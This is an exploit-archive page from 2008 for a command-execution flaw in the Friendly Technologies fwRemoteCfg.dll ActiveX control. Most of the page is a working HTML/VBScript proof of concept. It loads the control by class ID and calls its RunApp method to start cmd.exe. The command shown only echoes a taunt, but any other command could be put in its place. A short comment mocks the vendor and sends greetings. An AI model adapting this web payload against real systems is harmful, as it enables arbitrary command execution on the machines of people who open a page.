Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
# Published : 2008-08-28
# Author : spdr
# Previous Title : Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
# Next Title : Ultra Office ActiveX Control Remote Buffer Overflow Exploit

<!--
In addition to the overflow found in the "Friendly Technologies" dialers ActiveX,
Here is a "remote command execution" exploit.
Its so sad people dont actually Think...

Greetz to Binaryvision
======================
- http://www.binaryvision.org.il/
-- irc.nix.co.il/#binaryvision
--- written by spdr.
-->

<html>
<object classid='clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B' id='lamers' ></object>
<script language='vbscript'>

lamers.RunApp "cmd" ,"cmd /k echo So Simple, So Lame -- Somebody should get fired." ,0 

</script>

# www.Syue.com [2008-08-28]